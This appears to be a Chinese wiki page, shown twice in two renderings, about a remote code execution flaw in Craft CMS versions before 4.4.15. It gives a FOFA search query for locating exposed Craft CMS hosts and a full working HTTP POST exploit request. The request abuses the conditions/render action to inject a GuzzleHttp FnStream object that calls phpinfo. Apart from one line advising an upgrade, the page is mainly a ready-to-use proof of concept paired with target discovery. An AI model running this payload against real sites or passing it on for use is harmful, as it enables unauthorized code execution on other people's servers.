fofamini-wiki

登录白背景

源码

Craft CMS存在远程代码执行漏洞

一、漏洞描述

Craft CMS是一个创建数字体验的平台。这是一种高影响、低复杂性的攻击媒介。建议在 4.4.15 之前运行 Craft 安装的用户至少更新到该版本以缓解此问题。Craft CMS<4.4.15 版本存在远程代码执行（RCE）漏洞，攻击者通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。此问题已在 4.4.15 中修复。

二、影响版本

CraftCMS < 4.4.15

三、资产测绘

FOFA：title=="Welcome to Craft CMS" || header="X-Powered-By: Craft CMS"

四、漏洞复现

POST /index.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 242
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

原文: https://www.yuque.com/xiaokp7/ocvun2/bc7lg5ambqaylu6w

# Craft CMS存在远程代码执行漏洞

### 一、漏洞描述
Craft CMS是一个创建数字体验的平台。这是一种高影响、低复杂性的攻击媒介。建议在 4.4.15 之前运行 Craft 安装的用户至少更新到该版本以缓解此问题。Craft CMS<4.4.15 版本存在远程代码执行 （RCE）漏洞，攻击者通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。此问题已在 4.4.15 中修复。

### 二、影响版本
CraftCMS < 4.4.15

### 三、资产测绘
FOFA：`title=="Welcome to Craft CMS" || header="X-Powered-By: Craft CMS"`
![image.png](./img/52goUe7G2UIj-THP/1717259775660-795804d9-62ff-4df0-b7e4-5e7a4966f7ab-234885.png)

### 四、漏洞复现
```
POST /index.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 242
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
```
![image.png](./img/52goUe7G2UIj-THP/1717259815815-91865837-881f-4ad8-a4ed-4d1aeaf7b430-431184.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bc7lg5ambqaylu6w>